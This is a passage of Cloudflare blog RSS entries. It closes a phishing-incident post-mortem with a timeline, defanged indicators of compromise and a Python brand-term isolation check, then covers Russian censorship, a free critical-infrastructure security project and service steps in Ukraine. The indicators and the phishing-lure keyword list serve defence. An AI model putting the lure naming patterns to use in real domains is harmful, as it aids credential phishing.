      <a href="#4-update-detections-to-identify-any-subsequent-attack-attempts">
        
      </a>
    </div>
    <p>Using what we uncovered about this attack, we incorporated additional signals into our existing detections to specifically identify this threat actor. At the time of writing, we have not observed any additional waves targeting our employees. However, intelligence from the server indicated the attacker was targeting other organizations, including Twilio. We reached out to those organizations and shared intelligence on the attack.</p>
    <div>
      <h3>5. Audit service access logs for any additional indications of attack</h3>
      <a href="#5-audit-service-access-logs-for-any-additional-indications-of-attack">
        
      </a>
    </div>
    <p>Following the attack, we screened all our system logs for any additional fingerprints from this particular attacker. Given Cloudflare Access serves as the central control point for all Cloudflare applications, we can search the logs for any indication the attacker may have breached any systems. Given employees’ phones were targeted, we also carefully reviewed the logs of our employee directory providers. We did not find any evidence of compromise.</p>
    <div>
      <h2>Lessons Learned and Additional Steps We’re Taking</h2>
      <a href="#lessons-learned-and-additional-steps-were-taking">
        
      </a>
    </div>
    <p>We learn from every attack. Even though the attacker was not successful, we are making additional adjustments based on what we’ve learned. We’re adjusting the settings for Cloudflare Gateway to restrict or sandbox access to sites running on domains that were registered within the last 24 hours. We will also run any non-allowlisted sites containing terms such as “cloudflare”, “okta”, “sso”, and “2fa” through our <a href="https://www.cloudflare.com/learning/access-management/what-is-browser-isolation/">browser isolation technology</a>. We are also increasingly using <a href="https://www.cloudflare.com/products/zero-trust/email-security/">Cloudflare Area 1’s phish-identification technology</a> to scan the web and look for any pages that are designed to target Cloudflare. Finally, we’re tightening up our Access implementation to prevent any logins from unknown VPNs, residential proxies, and infrastructure providers. All of these are standard features of the same products we offer to customers.</p><p>The attack also reinforced the importance of three things we’re doing well. First, requiring hard keys for access to all applications. <a href="https://krebsonsecurity.com/2018/07/google-security-keys-neutralized-employee-phishing/">Like Google</a>, we have not seen any successful phishing attacks since rolling hard keys out. Tools like Cloudflare Access made it easy to support hard keys even across legacy applications. If you’re an organization interested in how we rolled out hard keys, reach out to <a>cloudforceone-irhelp@cloudflare.com</a> and our security team would be happy to share the best practices we learned through this process.</p><p>Second, using Cloudflare’s own technology to protect our employees and systems. Cloudflare One’s solutions like Access and Gateway were critical to staying ahead of this attack. We configured our Access implementation to require hard keys for every application. 
It also creates a central logging location for all application authentications and, if ever necessary, a place from which we can kill the sessions of a potentially compromised employee. Gateway gives us the ability to shut down malicious sites like this one quickly and to understand which employees may have fallen for the attack. These are all functionalities that we make available to Cloudflare customers as part of our Cloudflare One suite, and this attack demonstrates how effective they can be.</p><p>Third, having a paranoid but blame-free culture is critical for security. The three employees who fell for the phishing scam were not reprimanded. We’re all human and we make mistakes. It’s critically important that when we do, we report them and don’t cover them up. This incident provided another example of why security is part of every Cloudflare team member’s job.</p>
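<p>As an illustration of the brand-term isolation rule described above, a minimal hostname check could be sketched as follows (the allowlist and policy function are hypothetical, not our production Gateway configuration):</p>

```python
BRAND_TERMS = ("cloudflare", "okta", "sso", "2fa")
# Hypothetical allowlist of legitimate properties; not a real configuration.
ALLOWLIST = {"cloudflare.com", "blog.cloudflare.com", "okta.com"}

def isolate(hostname: str) -> bool:
    """Route any non-allowlisted site whose name contains a brand term through
    remote browser isolation rather than loading it directly."""
    if hostname in ALLOWLIST:
        return False
    return any(term in hostname for term in BRAND_TERMS)

assert isolate("cloudflare-okta.com") is True     # isolated
assert isolate("blog.cloudflare.com") is False    # allowlisted, loads normally
```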
    <div>
      <h2>Detailed Timeline of Events</h2>
      <a href="#detailed-timeline-of-events">
        
      </a>
    </div>
    <table>
<thead>
  <tr>
    <th>Time (UTC)</th>
    <th>Event</th>
  </tr>
</thead>
<tbody>
  <tr>
    <td>2022-07-20 22:49</td>
    <td>Attacker sends out 100+ SMS messages to Cloudflare employees and their families.</td>
  </tr>
  <tr>
    <td>2022-07-20 22:50</td>
    <td>Employees begin reporting SMS messages to Cloudflare Security team.</td>
  </tr>
  <tr>
    <td>2022-07-20 22:52</td>
    <td>Verify that the attacker's domain is blocked in Cloudflare Gateway for corporate devices.</td>
  </tr>
  <tr>
    <td>2022-07-20 22:58</td>
    <td>Warning communication sent to all employees across chat and email.</td>
  </tr>
  <tr>
    <td>2022-07-20 22:50 to 23:26</td>
    <td>Monitor telemetry in the Okta System log &amp; Cloudflare Gateway HTTP logs to locate credential compromise. Clear login sessions and suspend accounts on discovery.</td>
  </tr>
  <tr>
    <td>2022-07-20 23:26</td>
    <td>Phishing site is taken down by the hosting provider.</td>
  </tr>
  <tr>
    <td>2022-07-20 23:37</td>
    <td>Reset leaked employee credentials.</td>
  </tr>
  <tr>
    <td>2022-07-21 00:15</td>
    <td>Deep dive into attacker infrastructure and capabilities.</td>
  </tr>
</tbody>
</table>
    <div>
      <h2>Indicators of compromise</h2>
      <a href="#indicators-of-compromise">
        
      </a>
    </div>
    
<table>
<thead>
  <tr>
    <th>Value</th>
    <th>Type</th>
    <th>Context and MITRE Mapping</th>
  </tr>
</thead>
<tbody>
  <tr>
    <td>cloudflare-okta[.]com hosted on 147[.]182[.]132[.]52</td>
    <td>Phishing URL</td>
    <td><a href="https://attack.mitre.org/techniques/T1566/002/">T1566.002</a>: Phishing: Spear Phishing Link sent to users.</td>
  </tr>
  <tr>
    <td>64547b7a4a9de8af79ff0eefadde2aed10c17f9d8f9a2465c0110c848d85317a</td>
    <td>SHA-256</td>
    <td><a href="https://attack.mitre.org/techniques/T1219/">T1219</a>: Remote Access Software being distributed by the threat actor</td>
  </tr>
</tbody>
</table>
    <div>
      <h2>What You Can Do</h2>
      <a href="#what-you-can-do">
        
      </a>
    </div>
    <p>If you are seeing similar attacks in your environment, please don’t hesitate to reach out to <a>cloudforceone-irhelp@cloudflare.com</a>, and we’re happy to share best practices on how to keep your business secure. If, on the other hand, you are interested in learning more about how we implemented security keys, please review our <a href="/how-cloudflare-implemented-fido2-and-zero-trust/">blog post</a> or reach out to <a>securitykeys@cloudflare.com</a>.</p><p>Finally, do you want to work on detecting and mitigating the next attacks with us? We’re hiring on our Detection and Response team, <a href="https://boards.greenhouse.io/cloudflare/jobs/4364485?gh_jid=4364485">come join us</a>!</p> ]]></content:encoded>
            <category><![CDATA[Security]]></category>
            <category><![CDATA[Post Mortem]]></category>
            <category><![CDATA[Phishing]]></category>
            <category><![CDATA[Cloudflare Gateway]]></category>
            <category><![CDATA[Cloudflare Access]]></category>
            <guid isPermaLink="false">4NqFdSmdzCcdoVLRQ05xzx</guid>
            <dc:creator>Matthew Prince</dc:creator>
            <dc:creator>Daniel Stinson-Diess</dc:creator>
            <dc:creator>Sourov Zaman</dc:creator>
        </item>
        <item>
            <title><![CDATA[What Cloudflare is doing to keep the Open Internet flowing into Russia and keep attacks from getting out]]></title>
            <link>https://blog.cloudflare.com/what-cloudflare-is-doing-to-keep-the-open-internet-flowing-into-russia-and-keep-attacks-from-getting-out/</link>
            <pubDate>Sun, 03 Apr 2022 01:28:36 GMT</pubDate>
            <description><![CDATA[ Following Russia’s unjustified and tragic invasion of Ukraine in late February, the world has watched closely as Russian troops attempted to advance across Ukraine, only to be resisted and repelled by the Ukrainian people ]]></description>
            <content:encoded><![CDATA[ <p></p><p>Following Russia’s unjustified and tragic invasion of Ukraine in late February, the world has watched closely as Russian troops attempted to advance across Ukraine, only to be resisted and repelled by the Ukrainian people. Similarly, we’ve seen a <a href="/internet-traffic-patterns-in-ukraine-since-february-21-2022/">significant amount</a> of cyber attack activity in the region. We continue to work to protect an increasing number of Ukrainian government, media, financial, and nonprofit websites, and we <a href="https://www.heise.de/hintergrund/Running-the-ua-top-level-domain-in-times-of-war-6611777.html">protected the Ukrainian top level domain</a> (.ua) to help keep Ukraine’s presence on the Internet operational.</p><p>At the same time, we’ve closely watched significant and unprecedented activity on the Internet in Russia. The Russian government has taken steps to tighten its control over both the technical components and the content of the Russian Internet. For their part, the people in Russia are doing something very different. They have been adopting tools to maintain access to the global Internet, and they have been seeking out non-Russian media sources. This blog post outlines what we’ve observed.</p>
    <div>
      <h3>The Russian Government asserts control over the Internet</h3>
      <a href="#the-russian-government-asserts-control-over-the-internet">
        
      </a>
    </div>
    <p>Over the last five years, the Russian government has taken steps to tighten its control of a sovereign Internet within Russia’s borders, including laws requiring Russian ISPs to install equipment allowing the government to monitor and block Internet activity, and requiring the establishment of an exclusively Russian DNS (outside ICANN). It also created mechanisms for the Russian government to control how Russia was connected to the global Internet, so it could pull the plug if it wanted.</p><p>Since the Russian invasion of Ukraine, the Russian government has made a series of announcements related to implementation of its sovereign Internet laws. Russian government agencies were instructed to switch to Russian DNS servers, move public resources to Russian hosting services, and take a number of other steps designed to reduce reliance on non-Russian providers. Although some took these initiatives as <a href="https://www.vice.com/en/article/88gevb/russia-is-preparing-to-cut-itself-off-from-the-global-internet">an announcement</a> that Russia intended to disconnect from the global Internet, so far Russia does not appear to have leveraged the tools it has to disconnect itself entirely. We continue to see connections processing successfully in Russia through non-Russian infrastructure.</p><p>In the meantime, authorities in Russia have implemented a series of targeted blocking actions against websites and operators that they find objectionable. Initially, officials targeted popular social media sites like Facebook, Instagram, and Twitter, as well as Russian-language outlets based outside the country.</p><p>We can see the effect of some of those blocks on traffic from Russian users to different news websites in Russia and Ukraine before and after the blocks were implemented.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/L3AyeQAadXwnRnmF4CQZ4/d0b9b8b79c6529384e73f5dc570f96bc/image9-1.png" />
            
            </figure>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1OZmnMZGwqHUwitHYv0IcJ/f880e8c9a4060c1acbf57d4a65cb2f8d/image3-2.png" />
            
            </figure>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4MnPUvJDQq4a21Gk7GnN9X/fedc0bb29d75c0e62d7b2c59498ace80/image1-3.png" />
            
            </figure><p>In each case, these news sites saw exponential growth in their traffic in the days around the February 24th invasion of Ukraine. But that increase was met within a matter of days by actions to block traffic to those sites. The blocks had varying degrees of success over the first few weeks, though each of them seems to have eventually been successful in denying access to those sources of news through traditional Internet channels.</p><p>But that is only half the story. As the Russian government took steps to control traditional channels for Internet access, there were shifts in the ways many Russians used the Internet.</p>
    <div>
      <h3>Russian citizens turning to tools to gain access to the open Internet</h3>
      <a href="#russian-citizens-turning-to-tools-to-gain-access-to-the-open-internet">
        
      </a>
    </div>
    <p>Russians have been adopting applications and tools that allow them to engage with the Internet privately and avoid some of the mechanisms that the Russian government is using to control and monitor access to the Internet. Whereas the most popular applications in the Apple App Store in most of the world in March continued to relate to social media and games, the leaderboard in Russia looked very different:</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6PPLqjcchFGDvhzj8hsNt0/987c5ce751f0c23e8d79f044b8fd4541/image2-2.png" />
            
            </figure><p>All of the top apps in Russia in March were for private and secure Internet access or encrypted messaging, including the most downloaded app – Cloudflare’s own WARP / 1.1.1.1 (a privacy-focused recursive DNS resolver). This list of popular apps is a stunning contrast with every other country in the world.</p><p>Because of the significant popularity of WARP (1.1.1.1), we’ve had some detailed insight into exactly how this has played out. If we look back to the beginning of February, we see that Cloudflare’s WARP tool was little used in Russia. Its use took off from the first weekend of the war and peaked two weeks ago. Later, once this migration to secure tools became apparent, we saw attempts to block access to them.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4t9Sfa6JkRCIQqzf1LLmLa/fd6bc76f7f500cdf6e898902441a71c3/image10.png" />
            
            </figure><p>While levels have receded from their peak, a large number of Russians continue to use Cloudflare WARP at levels massively higher than pre-war.</p><p>In addition to Russians increasingly relying on private and encrypted communications, we’ve also seen a shift in what they are trying to access. Here’s a chart of DNS requests from Russian users for a well-known US newspaper. Recent DNS traffic for the site has quintupled compared to pre-war levels, indicating Russians are trying to access that news source.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2YTT5mE3ZZAsRhZ7OtTgeg/6148dcedb9620c4e1306ce4752f9cef2/image8.png" />
            
            </figure><p>And here’s DNS traffic for a large French news source. Again, DNS lookups have grown enormously as Russians try to access it.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4tf5We66VeiiZZfK2WP8wR/62df69d607cb8841d2ea1a5b0a1cd167/image5-1.png" />
            
            </figure><p>And here’s a British newspaper.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/22M1VPQEkIBbexTn0aUvGK/eae1604898841956d4781078ee9b199f/image4-1.png" />
            
            </figure><p>The picture is clear from these three charts. Russians want access to non-Russian news sources and, based on the popularity of private Internet access tools and VPNs, they are willing to work to get it.</p>
    <div>
      <h3>A front line against cyberattack</h3>
      <a href="#a-front-line-against-cyberattack">
        
      </a>
    </div>
    <p>In addition to the services we’ve been able to provide average citizens in Russia, our servers at the edge of the Internet in-country have also permitted us to detect and block attacks originating there. When attacks are mitigated inside Russia, they never travel outside Russian borders. That’s always been part of the proposition of Cloudflare’s distributed network – to identify and block cyber attacks (especially DDoS attacks) locally, and before they can ever get off the ground.</p><p>Here’s what DDoS activity originating inside Russia and blocked there by Cloudflare has looked like since the beginning of February. Normal DDoS activity originating from Russian networks and blocked by Cloudflare’s servers there is relatively low throughout February but then grows massively in the middle of March.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4Vlvd4C3ZfwroCzqAc6MIp/f7844f24b507e0e49c7ff2f3357f8690/image7.png" />
            
            </figure><p>To be clear, being able to identify where cyber attack traffic originates is not the same as being able to attribute where the attacker is located. Attributing cyber attacks is difficult, and now is a time to be particularly careful with attribution. It is relatively common for cyber attackers to launch attacks from remote locations around the world, often by hijacking devices in other countries through things like compromised IoT (Internet of Things) devices.</p><p>But even with such subterfuge, we’ve still seen a significant increase in the number of blocked attacks that are hitting our servers inside Russia.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2RqUtXpSJgEraVpwUN73Y7/d2db3f821adceb2553f335e0a1c9b36e/image6-1.png" />
            
            </figure><p>A few weeks ago, as the invasion of Ukraine was in its early stages, I noted that “<a href="/steps-taken-around-cloudflares-services-in-ukraine-belarus-and-russia/">Russia needs more Internet, not less</a>.” At a time of unprecedented economic sanctions by the United States and Europe, there have been calls for all foreign companies to go further and exit Russia completely, including calls for Internet providers to disconnect Russia. To be clear, Cloudflare has minimal sales and commercial activity in Russia – we’ve never had a corporate entity, an office, or employees there – and we’ve taken steps to ensure that we’re not paying taxes or fees to the Russian government. But given the significant impact of our services on the availability and security of the Internet, we believe removing our services from Russia altogether would do more harm than good.</p><p>While we deeply appreciate the motivation of the calls for companies to exit Russia, this withdrawal by Internet companies can have the unintended effect of advancing and entrenching the interests of the Russian government to control the Internet in Russia. Efforts to have Russia cut off from the global Internet through <a href="https://www.icann.org/en/system/files/correspondence/marby-to-fedorov-02mar22-en.pdf">ICANN</a> and <a href="https://www.ripe.net/publications/news/announcements/ripe-ncc-response-to-request-from-ukrainian-government">RIPE</a> will only cut off the Russian people from information about the war in Ukraine that the Russian government doesn’t want them to access.  After a number of U.S.-based certificate authorities stopped issuing SSL certificates for Russian websites, Russia <a href="https://www.bleepingcomputer.com/news/security/russia-creates-its-own-tls-certificate-authority-to-bypass-sanctions/">responded</a> in early March by encouraging Russian citizens to download a Russian Root Certificate Authority instead. 
As observed by <a href="https://www.eff.org/deeplinks/2022/03/you-should-not-trust-russias-new-trusted-root-ca">EFF</a>, “the Russian state’s stopgap measure to keep its services running also enables spying on Russians, now and in the future.”</p><p>This is why there has been near-universal agreement among experts that it is imperative the Russian Internet stay as open as possible for the Russian people. Dozens of civil society groups have <a href="https://www.accessnow.org/letter-us-government-internet-access-russia-belarus-ukraine/">urged</a> governments to work to counteract authoritarian actions “and ensure that sanctions and other steps meant to repudiate the Russian government’s illegal actions do not backfire, by reinforcing Putin’s efforts to assert information control.” Russian digital rights activists have <a href="https://roskomsvoboda.org/post/24-february-24-march-2022/">pleaded with</a> service providers to offer Russians free VPN access, so they are not left isolated from global news sources. Even the U.S. State Department has <a href="https://www.washingtonpost.com/technology/2022/03/16/apple-google-cloudflare-russia/">made clear</a>, “It is critical to maintain the flow of information to the people of Russia to the fullest extent possible.”</p><p>In support of our mission to help build a better Internet, our team has spent a busy six weeks monitoring these developments and working around the clock to make sure Ukrainian web properties are defended and that ordinary Russians can access the global Internet. We remain in awe of the brave Ukrainians standing up in defense of their homeland, and continue to hope that peace will prevail.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/y2JtB5XQIA6nRzvTn7mj7/01e4a697fff09b8211ecc20dd6b40ed7/image1-8.png" />
            
            </figure><p></p> ]]></content:encoded>
            <category><![CDATA[Ukraine]]></category>
            <category><![CDATA[Russia]]></category>
            <category><![CDATA[Freedom of Speech]]></category>
            <category><![CDATA[Policy & Legal]]></category>
            <guid isPermaLink="false">22RL3iYsnMld5ewbY0p3Vx</guid>
            <dc:creator>Matthew Prince</dc:creator>
        </item>
        <item>
            <title><![CDATA[Cloudflare, CrowdStrike, and Ping Identity launch the Critical Infrastructure Defense Project]]></title>
            <link>https://blog.cloudflare.com/announcing-critical-infrastructure-defense/</link>
            <pubDate>Mon, 07 Mar 2022 13:59:10 GMT</pubDate>
            <description><![CDATA[ Cloudflare has launched the Critical Infrastructure Defense Project to counter potential cyber retaliation for sanctions resulting from Russia's invasion of Ukraine. ]]></description>
            <content:encoded><![CDATA[ 
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4PYAT3vYGJDL8sN4RWqK1u/9513eca4980156be63338a8b13017010/unnamed--1--1.png" />
            
            </figure><p>Today, in partnership with CrowdStrike and Ping Identity, Cloudflare is launching the Critical Infrastructure Defense Project (<a href="https://criticalinfrastructuredefense.org/">CriticalInfrastructureDefense.org</a>). The Project was born out of conversations with cybersecurity and government experts concerned about potential retaliation to the sanctions that resulted from the Russian invasion of Ukraine.</p><p>In particular, there is a fear that critical United States infrastructure will be targeted with cyber attacks. While these attacks may target any industry, the experts we consulted with were particularly concerned about three areas that were often underprepared and could cause significant disruption: hospitals, energy, and water.</p><p>To help address that need, Cloudflare, CrowdStrike, and Ping Identity have committed under the Critical Infrastructure Defense Project to offer a broad suite of our products for free for at least the next four months to any United States-based hospital, or energy or water utility. You can learn more at: <a href="https://www.criticalinfrastructuredefense.org/">www.CriticalInfrastructureDefense.org</a>.</p><p>We are not powerless against hackers. Organizations that have adopted a <a href="https://www.cloudflare.com/learning/security/glossary/what-is-zero-trust/">Zero Trust</a> approach to security have been successful at mitigating even determined attacks. There are three core components to any Zero Trust security approach: 1) <a href="https://www.cloudflare.com/network-security/">Network Security,</a> 2) Endpoint Security; and 3) Identity.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4qsBquy4mvUEGdVzPymHB2/a2baa8bf14858b724e73e3f9ef0efd8d/image2-3.png" />
            
            </figure><p>Cloudflare, CrowdStrike, and Ping Identity are three of the leading Zero Trust security companies securing each of these components. <a href="https://www.cloudflare.com/products/zero-trust/">Cloudflare's Zero Trust network security</a> offers a broad set of services that organizations can easily <a href="https://www.cloudflare.com/learning/access-management/how-to-implement-zero-trust/">implement</a> to ensure their connections are protected no matter where users access the network. CrowdStrike provides a broad set of end point security services to ensure that laptops, phones, and servers are not compromised. And Ping Identity provides identity solutions, including multi-factor authentication, that are foundational to any organization's <a href="https://www.cloudflare.com/cybersecurity-risk-management/">posture</a>.</p><p>Each of us is great at what we do on our own. Together, we provide <a href="https://www.cloudflare.com/zero-trust/solutions/">an integrated solution</a> that is unrivaled and proven to stand up to even the most sophisticated nation state cyber attacks.</p><p>And this is what we think is required, because the current threat is significantly higher than what we have seen since any of our companies was founded. We all built our companies relying on the nation’s infrastructure, and we believe it is incumbent on us to provide our technology in order to protect that <a href="https://www.cloudflare.com/the-net/government/critical-infrastructure/">infrastructure</a> when it is threatened. For this period of heightened risk, we are all providing our services at no cost to organizations in these most vulnerable sectors.</p><p>We've also worked together to ensure our products function in harmony and are easy to implement. We don't want short-staffed IT teams, long requisition processes, or limited budgets to stand in the way of getting the protection that's needed in place immediately. 
We've taken a cue from hospitals and triaged the risks into a recommended list for organizations that may be short on IT staff: what to prioritize over the next day, over the next week, and over the next month.</p><p>You can download the recommended security triage program <a href="https://criticalinfrastructuredefense.org/files/Critical_Infrastructure_Defense_Project_Guide.pdf">here</a>. We know that not every organization will be able to implement every recommendation. But every step you get through on the list will help your organization be incrementally better prepared for whatever is to come.</p><p>Our teams are also committed to working directly with organizations in these sectors to make onboarding as quick and painless as possible. We will onboard customers under this project with the same level of service as if they were our largest paying customers. We believe it is our duty to help ensure that the nation’s critical infrastructure remains online and available through this challenging time.</p><p>We anticipate that, based on what we learn over the days ahead, the Critical Infrastructure Defense Project may expand to additional sectors and countries. We hope the predictions of retaliatory cyberattacks don't come true. But, if they do, we know our solutions can mitigate the risk, and we stand ready to fully deploy them to protect our most critical infrastructure.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5saVolAt0sSiUthAF4PvHf/1600e5fa8a5f30983f3ff9c634e497f1/image1-3.png" />
            
            </figure> ]]></content:encoded>
            <category><![CDATA[Zero Trust]]></category>
            <category><![CDATA[Cloudflare Zero Trust]]></category>
            <category><![CDATA[Security]]></category>
            <guid isPermaLink="false">1U4xY4VOyEDrY5H3rZ6roL</guid>
            <dc:creator>Matthew Prince</dc:creator>
        </item>
        <item>
            <title><![CDATA[Steps we've taken around Cloudflare's services in Ukraine, Belarus, and Russia]]></title>
            <link>https://blog.cloudflare.com/steps-taken-around-cloudflares-services-in-ukraine-belarus-and-russia/</link>
            <pubDate>Mon, 07 Mar 2022 05:03:59 GMT</pubDate>
            <description><![CDATA[ At Cloudflare, we watched in horror as Russia invaded Ukraine. As war looked more likely, we monitored the situation with the goal of keeping our employees, our customers, and our network safe. ]]></description>
            <content:encoded><![CDATA[ <p>At Cloudflare, we've watched the Russian invasion of Ukraine in horror. As the possibility of war looked more likely, we began to carefully monitor the situation on the ground, with the goal of keeping our employees, our customers, and our network safe.</p>
    <div>
      <h3>Helping protect Ukraine against cyberattacks</h3>
      <a href="#helping-protect-ukraine-against-cyberattacks">
        
      </a>
    </div>
    <p>Attacks against the Internet in Ukraine <a href="/internet-traffic-patterns-in-ukraine-since-february-21-2022/">began</a> even before the start of the invasion. Those attacks—and the steady stream of DDoS attacks we’ve seen in the days since—prompted us to extend our services to Ukrainian government and telecom organizations at no cost in order to ensure they can continue to operate and deliver critical information to their citizens as well as to the rest of the world about what is happening to them.</p><p>Going beyond that, under <a href="https://www.cloudflare.com/galileo/">Project Galileo</a>, we are expediting onboarding of any Ukrainian entities for our full suite of protections. We are currently assisting more than sixty organizations in Ukraine and the region—with about 25% of those organizations coming aboard during the current crisis. Many of the new organizations are groups coming together to assist refugees, share vital information, or members of the Ukrainian diaspora in nearby countries looking to organize and help. Any Ukrainian organizations that are facing attack can apply for free protection under Project Galileo by visiting <a href="https://www.cloudflare.com/galileo">www.cloudflare.com/galileo</a>, and we will expedite their review and approval.</p>
    <div>
      <h3>Securing our customers’ data during the conflict</h3>
      <a href="#securing-our-customers-data-during-the-conflict">
        
      </a>
    </div>
    <p>In order to preserve the integrity of customer data, we moved customer encryption key material out of our data centers in Ukraine, Russia, and Belarus. Our services continued to operate in the regions using our Keyless SSL technology, which allows encryption sessions to be terminated in a secure data center away from where there may be a risk of compromise.</p><p>If any of our facilities or servers in Ukraine, Belarus, or Russia lose power or connectivity to the Internet, we have configured them to brick themselves. All data on disk is encrypted with keys that are not stored on site. Bricked machines cannot be booted unless a secure, machine-specific key that is not stored on site is entered.</p>
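    <p>The "brick on power loss" design described above is essentially full-disk encryption with a key held elsewhere. As a minimal, illustrative sketch (this is not Cloudflare's actual implementation; the key service and all names here are hypothetical), the idea looks like this in Node.js:</p>
            <pre><code>const crypto = require("crypto");

// Stands in for key material held in a secure location away from the
// data center. A machine that cannot reach it cannot decrypt its own disk.
function fetchOffsiteKey() {
  return crypto.createHash("sha256").update("remote-key-material").digest();
}

function encryptDisk(plaintext, key) {
  const iv = crypto.randomBytes(12);
  const cipher = crypto.createCipheriv("aes-256-gcm", key, iv);
  const ciphertext = Buffer.concat([cipher.update(plaintext, "utf8"), cipher.final()]);
  return { iv, ciphertext, tag: cipher.getAuthTag() };
}

function decryptDisk(blob, key) {
  const decipher = crypto.createDecipheriv("aes-256-gcm", key, blob.iv);
  decipher.setAuthTag(blob.tag);
  // With the wrong key, GCM authentication fails and this throws:
  // the data stays unreadable, and the machine stays "bricked".
  return Buffer.concat([decipher.update(blob.ciphertext), decipher.final()]).toString("utf8");
}

const blob = encryptDisk("customer data", fetchOffsiteKey());
console.log(decryptDisk(blob, fetchOffsiteKey()));</code></pre>
    <p>The security property is that nothing on the machine itself is sufficient to recover the plaintext; recovery requires re-establishing contact with the off-site key.</p>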
    <div>
      <h3>Monitoring Internet availability in Ukraine</h3>
      <a href="#monitoring-internet-availability-in-ukraine">
        
      </a>
    </div>
    <p>Our team continues to monitor Internet patterns across Ukraine. While usage across the country has declined over the last 10 days, we are thankful that in most locations the Internet is still accessible.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/656Iuyuwp8AZFFVokbz8vl/8400217c1e1a18728df470b137dc7145/image1-2.png" />
            
            </figure><p>We are taking steps to ensure that, as long as there is connectivity out of the country, our services will continue to operate.</p>
    <div>
      <h3>Staying ahead of the threat globally</h3>
      <a href="#staying-ahead-of-the-threat-globally">
        
      </a>
    </div>
    <p>Cyber threats to Ukrainian customers and telecoms are only part of the broader story of potential cyberattacks. Governments around the world have emphasized that organizations must be prepared to respond to disruptive cyber activity. The US Cybersecurity and Infrastructure Security Agency (CISA), for example, <a href="https://www.cisa.gov/shields-up">has recommended</a> that all organizations—large and small—go “Shields Up” to protect themselves from attack. The UK’s National Cyber Security Centre has <a href="https://www.ncsc.gov.uk/news/organisations-urged-to-bolster-defences">encouraged</a> organizations to improve their <a href="https://www.cloudflare.com/learning/security/what-is-cyber-resilience/">cyber resilience</a>.</p><p>This is where careful monitoring of the attacks in Ukraine is so important. It doesn’t just help our customers in Ukraine — it helps us learn and improve our products so that we can protect all of our customers globally. When wiper malware was identified in Ukraine, for example, we adapted our <a href="https://www.cloudflare.com/learning/security/glossary/what-is-zero-trust/">Zero Trust</a> products to make sure our customers were protected.</p><p>We’ve long believed that everyone should have access to <a href="https://www.cloudflare.com/products/zero-trust/threat-defense/">cybersecurity tools</a> to protect themselves, regardless of their size or resources. But during this time of heightened threat, access to <a href="https://www.cloudflare.com/learning/security/what-is-cyber-security/">cybersecurity services</a> is particularly critical. We have a number of free services available to protect you online — and <a href="/shields-up-free-cloudflare-services-to-improve-your-cyber-readiness/">we encourage you to take advantage of them</a>.</p>
    <div>
      <h3>Providing services in Russia</h3>
      <a href="#providing-services-in-russia">
        
      </a>
    </div>
    <p>Since the invasion, providing any services in Russia is understandably fraught. Governments have been united in imposing a stream of new sanctions and there have even been some calls to disconnect Russia from the global Internet. As discussed by <a href="https://www.icann.org/en/system/files/correspondence/marby-to-fedorov-02mar22-en.pdf">ICANN</a>, the <a href="https://www.internetsociety.org/blog/2022/03/why-the-world-must-resist-calls-to-undermine-the-internet/">Internet Society</a>, the <a href="https://www.eff.org/deeplinks/2022/03/wartime-bad-time-mess-internet">Electronic Frontier Foundation</a>, and <a href="https://www.techdirt.com/2022/03/02/very-very-bad-ideas-ukraine-asks-icann-to-disconnect-russia-from-the-internet/">Techdirt</a>, among others, the consequences of such a shutdown would be profound.</p><p>The new sanctions issued in the last few weeks have been unprecedented in their reach, frequency, and the number of different governments involved. Governments have issued sweeping new sanctions designed to impose severe costs on those who supported the invasion of Ukraine, including government entities and officials in Russia and Belarus. Sanctions have been imposed against Russia’s top financial institutions, including Russia’s two largest banks, fundamentally altering the ability of Russians to access capital. The breakaway territories of Donetsk and Luhansk, including all of the residents of those regions, are subject to comprehensive sanctions. We’ve seen sanctions on state-owned enterprises, elite Russian families, and the leaders of intelligence-directed disinformation outlets.</p><p>These sanctions are intended to make sure that those who supported the invasion are held to account. And Cloudflare has taken action to comply. 
Over the past several years, Cloudflare has developed a robust and comprehensive sanctions compliance program that allows us to track and take immediate steps to comply with new sanctions regulations as they are implemented. In addition to an internal compliance team and outside counsel, we employ third-party tools to flag potential matches or partial ownership by sanctioned parties, and we review reports from third parties about potential connections. We have also worked with government experts inside and outside the United States to identify when there is a connection between a sanctioned entity and a Cloudflare account.</p><p>Over the past week, our team has ensured that we are complying with these new sanctions as they are announced. We have closed off paid access to our network and systems in the new comprehensively-sanctioned regions. And we have terminated any customers we have identified as tied to sanctions, including those related to Russian financial institutions, Russian influence campaigns, and the Russian-affiliated Donetsk and Luhansk governments. We’ve never had any offices or employees located in Russia, and we have taken steps to prevent the company from making any payments for things like taxes or fees to the Russian government. We expect additional sanctions are likely to come from governments as they determine additional steps are appropriate, and we will continue to move quickly to comply with those requirements as they are announced.</p><p>Beyond this, we have received several calls to terminate all of Cloudflare's services inside Russia. We have carefully considered these requests and discussed them with government and civil society experts. 
Our conclusion, in consultation with those experts, is that Russia needs more Internet access, not less.</p><p>As the conflict has continued, we’ve seen a dramatic increase in requests from Russian networks to worldwide media, reflecting a desire by ordinary Russian citizens to see world news beyond that provided within Russia.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4MSNhXX3NDNjHSfJlBr0TT/4215bc0f344fe3ba2523ca59e4a309ed/image2-2.png" />
            
